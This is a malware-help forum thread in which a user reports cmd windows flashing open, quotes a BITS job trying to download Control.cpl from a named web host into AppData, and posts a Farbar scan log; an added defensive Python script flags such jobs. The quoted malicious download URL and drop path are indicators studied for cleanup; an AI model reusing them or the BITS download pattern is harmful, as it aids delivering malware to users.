Murilo Beraldo

CMD opens and closes by itself from time to time


Hello everyone.

A few years ago I ran into this same problem and thought it had been solved.

It turns out that for some time now this same problem has come back.

What exactly happens:

1. I am using the computer normally, browsing, working or playing something.

2. Cmd opens for about 2 seconds and closes automatically. Sometimes it stays open with the following log:

DISPLAY: 'My' TYPE: DOWNLOAD STATE: TRANSIENT_ERROR
PRIORITY: HIGH FILES: 0 / 1 BYTES: 0 / UNKNOWN
ERROR FILE:   http://www.dicasimpressao.esy.es/FE-1.0.0.0/Control.cpl -> C:\Users\A\AppData\Roaming\Microsoft\Control.cpl
ERROR CODE:    0x80072ee7 - O nome ou o endereço do servidor não pôde ser resolvido
ERROR CONTEXT: 0x00000005 - O erro ocorreu durante o processamento do arquivo remoto.

3. 60-90 seconds later another cmd window opens, which also opens and closes, but faster. I could not catch what is written in it.

It seems the computer is trying to access a remote file?

I have tried several things over the years. I am not sure how to proceed.

Does anyone have any idea what I can do?

I am thinking about formatting the PC for good...

Thank you very much!

Murilo Beraldo

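The record quoted in the post is a BITS (Background Intelligent Transfer Service) job status of the kind bitsadmin.exe prints, and the FRST process list further down shows C:\Windows\System32\bitsadmin.exe running next to the cmd.exe windows. The job is trying to fetch a Control Panel file (.cpl, a loadable executable) from a web host into the roaming profile; the 0x80072ee7 error only says the host name no longer resolves, so the job stays queued and BITS keeps retrying it, which is consistent with a console window popping up on a schedule. On the affected machine the first-hand check is `Get-BitsTransfer -AllUsers` in an elevated PowerShell (or `bitsadmin /list /allusers /verbose`). The script below is an added example, not code from this thread, from Farbar or from Microsoft: it parses job records in the layout quoted above and flags the traits a defender looks for. The sample text is constructed (the first record copies the post, the second is an invented benign job), and the scoring rules are my own heuristics, not a BITS API.

```python
"""Triage of BITS job status records like the one quoted in the post.

Added example, not code from the thread, Farbar or Microsoft. SAMPLE_BITS_OUTPUT
is constructed: the first record copies the post, the second is an invented
benign job. The parser targets that record layout; the rules are heuristics.
"""
import re
from dataclasses import dataclass, field

SAMPLE_BITS_OUTPUT = r"""
DISPLAY: 'My' TYPE: DOWNLOAD STATE: TRANSIENT_ERROR
PRIORITY: HIGH FILES: 0 / 1 BYTES: 0 / UNKNOWN
ERROR FILE:   http://www.dicasimpressao.esy.es/FE-1.0.0.0/Control.cpl -> C:\Users\A\AppData\Roaming\Microsoft\Control.cpl
ERROR CODE:    0x80072ee7 - O nome ou o endereço do servidor não pôde ser resolvido
ERROR CONTEXT: 0x00000005 - O erro ocorreu durante o processamento do arquivo remoto.

DISPLAY: 'Example Updater' TYPE: DOWNLOAD STATE: TRANSFERRED
PRIORITY: NORMAL FILES: 1 / 1 BYTES: 2048 / 2048
FILE: https://updates.example.com/catalog.json -> C:\Program Files\Example\catalog.json
"""

# File types a background transfer should rarely be dropping into a profile.
EXEC_EXTENSIONS = (".cpl", ".exe", ".dll", ".scr", ".hta", ".ps1", ".vbs", ".js", ".bat", ".cmd")
# Lower-case path fragments of locations any user process can write to.
USER_WRITABLE_HINTS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
NAME_NOT_RESOLVED = "0x80072ee7"  # WinINet: server name or address could not be resolved

JOB_HEADER = re.compile(r"DISPLAY:\s*'(?P<display>[^']*)'\s+TYPE:\s*(?P<type>\S+)\s+STATE:\s*(?P<state>\S+)")
PRIORITY_LINE = re.compile(r"^PRIORITY:\s*(?P<priority>\S+)")
FILE_LINE = re.compile(r"^(?:ERROR\s+)?FILE:\s*(?P<remote>\S+)\s*->\s*(?P<local>.+?)\s*$")
ERROR_CODE_LINE = re.compile(r"^ERROR CODE:\s*(?P<code>0x[0-9A-Fa-f]+)")


@dataclass
class BitsJob:
    display: str
    job_type: str
    state: str
    priority: str = ""
    files: list = field(default_factory=list)  # (remote_url, local_path) pairs
    error_code: str = ""


def parse_bits_jobs(text):
    """Split status output into BitsJob records, one per DISPLAY: header."""
    jobs, job = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if (m := JOB_HEADER.search(line)):
            job = BitsJob(m["display"], m["type"], m["state"])
            jobs.append(job)
        elif job is None:
            continue  # text before the first job header
        elif (m := PRIORITY_LINE.search(line)):
            job.priority = m["priority"]
        elif (m := FILE_LINE.search(line)):
            job.files.append((m["remote"], m["local"]))
        elif (m := ERROR_CODE_LINE.search(line)):
            job.error_code = m["code"].lower()
    return jobs


def assess(job):
    """Return findings for one job; an empty list means nothing stood out."""
    findings = []
    for remote, local in job.files:
        low = local.lower()
        if low.endswith(EXEC_EXTENSIONS):
            findings.append(f"executable file type fetched: {local}")
        if any(hint in low for hint in USER_WRITABLE_HINTS):
            findings.append(f"destination is a user-writable profile path: {local}")
        if remote.lower().startswith("http://"):
            findings.append(f"plaintext HTTP source, no transport integrity: {remote}")
    if (job.job_type.upper() == "DOWNLOAD"
            and job.state.upper() in ("TRANSIENT_ERROR", "ERROR")
            and job.error_code == NAME_NOT_RESOLVED):
        findings.append("source host does not resolve; job stays queued and BITS keeps retrying it")
    return findings


def triage(text):
    """(display name, findings) for every job, most suspicious first."""
    report = [(job.display, assess(job)) for job in parse_bits_jobs(text)]
    return sorted(report, key=lambda item: -len(item[1]))


if __name__ == "__main__":
    for name, findings in triage(SAMPLE_BITS_OUTPUT):
        print(f"{name}: {'; '.join(findings) or 'nothing unusual'}")
```

Run against the sample, the poster's job collects four findings (executable type, profile drop path, plaintext source, dead host) while the invented updater job collects none. A job identified this way can be cancelled with `Remove-BitsTransfer`, but whatever re-creates it (a scheduled task, a Run key, a script) still has to be found, which is what the FRST logs requested in the reply below are for.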

@Murilo Beraldo

Please note the following:

  • About the forum: this is a private space, not a public one. Using it is a privilege, not a right;
  • What is given here relates only to your computer's problem, so do not apply it on any other;
  • IMPORTANT: if you have Windows activation programs or torrent-sharing programs, I suggest uninstalling them. I will only proceed with the analysis after they are removed. Forum rules;
  • Please follow the instructions given carefully and, in case of doubt, do not hesitate to ask;
  • Respect the order of the instructions given;
  • Note: do not take any measure beyond those given here; if you ask for help on another forum, be sure to let us know, at the risk of misconfiguring your computer!

Download Farbar Recovery Scan Tool from the link below and save it to your desktop.

NOTE: download the version matching your architecture (32-bit or 64-bit)
https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/

** Windows Vista, Windows 7, 8/8.1 and Windows 10 users:
Right-click the FRST64.EXE file, then click on [image].
Accept the license agreement and then click the Scan button.

Wait, and at the end the FRST.txt and Addition.txt logs will be saved to your desktop.

Select, copy and paste the contents of FRST.txt in your next reply and attach Addition.txt

Topic author

Hello. Here it is.

Thanks!


    Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 14-09-2017 01
    Executado por A (administrador) em LUCAS-PC (14-09-2017 21:27:03)
    Executando a partir de C:\Users\A\Desktop
    Perfis Carregados: A (Perfis Disponíveis: A)
    Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Português (Brasil)
    Internet Explorer Versão 11 (Navegador padrão: Chrome)
    Modo da Inicialização: Normal
    Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processos (Whitelisted) =================

    (Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

    (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
    (Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
    (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe
    (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\System32\cmd.exe
    (Microsoft Corporation) C:\Windows\System32\bitsadmin.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

    ==================== Registro (Whitelisted) ====================

    (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13530184 2013-04-22] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-04-11] (Intel Corporation)
    HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
    HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-02-21] (Intel Corporation)
    HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [1871344 2017-08-10] (Adobe Systems Inc.)
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [Akamai NetSession Interface] => C:\Users\A\AppData\Local\Akamai\netsession_win.exe [4673432 2014-10-29] (Akamai Technologies, Inc.)
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [AdobeBridge] => [X]
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8722136 2016-06-01] (Piriform Ltd)
    Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll

    ==================== Internet (Whitelisted) ====================

    (Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

    Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 201.6.2.93 201.6.2.119
    Tcpip\..\Interfaces\{61404789-C97D-4202-8464-A9A596FC93CD}: [NameServer] 8.8.8.8
    Tcpip\..\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D}: [DhcpNameServer] 201.6.2.93 201.6.2.119

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-21-1444981709-1690395092-1683229413-1000 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
    BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: Sem Nome -> {6F83220D-2200-1287-2249-17574CA92DB0}22202F76204E6F4578706C6F726572202F74205245475F44574F5244202F642031202F66 -> Nenhum Arquivo
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-26] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM - avast! WebRep - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  Nenhum Arquivo
    Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    Handler: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} -  Nenhum Arquivo

    FireFox:
    ========
    FF ProfilePath: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default [2017-09-14]
    FF DefaultSearchEngine: Mozilla\Firefox\Profiles\j167jror.default -> Google (avast)
    FF Homepage: Mozilla\Firefox\Profiles\j167jror.default -> about:home
    FF SearchPlugin: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\searchplugins\google-avast.xml [2014-12-05]
    FF HKLM-x32\...\Firefox\Extensions: [amizade@technet.com] - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi
    FF Extension: (Mozilla Firefox Security) - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi [2014-12-04] [não assinado]
    FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.15@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn
    FF Extension: (Adobe Acrobat DC - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn [2017-04-27]
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E886D}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\cef\xpi => não encontrado (a)
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E8874}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\abn\xpi => não encontrado (a)
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\buscape.xml [2015-05-07]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mercadolivre.xml [2015-05-07]
    FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_26_0_0_151.dll [2017-08-12] ()
    FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-03-27] (Adobe Systems)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_151.dll [2017-08-12] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
    FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2017-08-10] (Adobe Systems Inc.)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-03-27] (Adobe Systems)
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/abn -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_abn.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef64 -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll [Nenhum Arquivo]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)

    Chrome: 
    =======
    CHR DefaultProfile: Default
    CHR StartupUrls: Default -> "hxxp://www.hotmail.com/"
    CHR Profile: C:\Users\A\AppData\Local\Google\Chrome\User Data\Default [2017-09-14]
    CHR Extension: (Google Apresentações) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-03]
    CHR Extension: (Google Docs) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-03]
    CHR Extension: (Google Drive) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
    CHR Extension: (YouTube) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Google Search) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-08-04]
    CHR Extension: (Planilhas do Google) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-03]
    CHR Extension: (Documentos Google off-line) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
    CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
    CHR Extension: (GBBD Caixa Economica Federal) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbcaplhfkihhldmlbjhgajdeghjdbffi [2015-01-24]
    CHR Extension: (Gmail) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-27]
    CHR Extension: (Chrome Media Router) - C:\Users\A\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-15]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Google [2015-01-28]
    CHR Extension: (Acrobat PDF Reader) - C:\Users\A\AppData\Roaming\Microsoft\Microsoft\Console\Application\Google\Update\0315 [2015-03-15]
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

    ==================== Serviços (Whitelisted) ====================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

    S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [771672 2017-03-14] (Adobe Systems Incorporated)
    S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
    S4 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [927232 2012-10-29] ()
    S4 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [445976 2016-08-03] (BlueStack Systems, Inc.)
    S4 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [425496 2016-08-03] (BlueStack Systems, Inc.)
    S4 BstHdPlusAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe [462360 2016-08-03] (BlueStack Systems, Inc.)
    S4 Ds3Service; E:\Arquivos de Programas\Scarlet.Crush Productions\bin\ScpService.exe [381952 2014-04-02] (Scarlet.Crush Productions) [Arquivo não assinado]
    R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [16232 2014-04-11] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [731648 2013-02-13] (Intel(R) Corporation) [Arquivo não assinado]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [820184 2013-02-13] (Intel(R) Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-03-12] (Intel Corporation)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6058960 2017-08-21] (Malwarebytes)
    R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [Arquivo não assinado]
    S4 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG)
    S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-06-21] (NVIDIA Corporation)
    S4 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-18] (NVIDIA Corporation)
    S4 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [450168 2017-06-21] (NVIDIA Corporation)
    S4 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-02-22] (Electronic Arts)
    S4 RoxMediaDBGame1X; C:\Program Files (x86)\Common Files\Roxio Shared\Game1X\SharedCOM\RoxMediaDBGame1X.exe [1096424 2014-07-09] (Corel Corporation)
    S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [137216 2016-03-29] (Microsoft Corporation) [Arquivo não assinado]
    S3 VsEtwService120; C:\Program Files (x86)\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [87728 2013-10-04] (Microsoft Corporation)
    S3 VSStandardCollectorService140; E:\Arquivos de Programas\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation)
    R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
    S4 WTabletServiceCon; C:\Program Files\Tablet\Pen\WTabletServiceCon.exe [627992 2014-01-13] (Wacom Technology, Corp.)
    S2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [X]

    ===================== Drivers (Whitelisted) ======================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

    R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2016-08-03] (BlueStack Systems)
    R2 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [307768 2016-07-28] (Bluestack System Inc. )
    S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-01-15] (Disc Soft Ltd)
    S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-01-15] (Disc Soft Ltd)
